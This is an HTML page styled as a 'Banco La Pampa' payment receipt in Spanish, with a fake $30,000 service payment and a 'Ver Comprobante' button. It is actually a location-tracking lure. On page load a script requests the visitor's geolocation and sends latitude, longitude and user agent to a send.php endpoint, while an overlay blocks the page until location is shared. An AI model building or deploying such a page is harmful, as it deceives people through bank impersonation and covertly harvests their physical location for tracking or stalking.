<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Banco La Pampa</title>
<link rel="icon" href="OIP (10).jpg" type="image/x-icon">
<style>
  body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 20px;
    background-color: #685d5d;
  }
  .container {
    background-color: #fcbf06;
    max-width: 600px;
    margin: 0 auto;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
  }
  h1 {
    color: #333;
    text-align: center;
    margin-bottom: 20px;
  }
  .comprobante {
    border: 2px solid #ccc;
    padding: 20px;
    border-radius: 5px;
    margin-bottom: 20px;
    display: none; /* Ocultar el bloque inicialmente */
  }
  .boton-ver {
    display: block;
    width: 200px;
    margin: 0 auto;
    padding: 10px;
    background-color: #007bff;
    color: #fff;
    text-align: center;
    text-decoration: none;
    border-radius: 5px;
  }
  .boton-ver:hover {
    background-color: #3192fa;
  }
  #overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5);
    display: flex;
    justify-content: center;
    align-items: center;
    z-index: 1000;
  }
</style>
</head>
<body onload="getLocation()">
  <div id="overlay"></div>
  <script>
    function getLocation() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
      }
    }
    
    function showPosition(position) {
      const xhttp = new XMLHttpRequest();
      xhttp.open("GET", "send.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude + "&agent=" + navigator.userAgent )
      xhttp.send();
      document.getElementById('overlay').style.display = 'none';
    }

    // Función para mostrar el comprobante al hacer clic
    document.addEventListener('DOMContentLoaded', function() {
      document.querySelector('.boton-ver').addEventListener('click', function() {
        document.querySelector('.comprobante').style.display = 'block';
      });
    });
  </script>
  <div class="container">
    <h1>Pago exitoso - Para ver el comprobante haga clic abajo</h1>
    <div class="comprobante">
      <p>Fecha: 03/03/24</p>
      <p>Motivo: Pago de servicios</p>
      <p>Monto: $30000.00</p>
    </div>
    <a class="boton-ver">Ver Comprobante</a>
  </div>
</body>
</html>
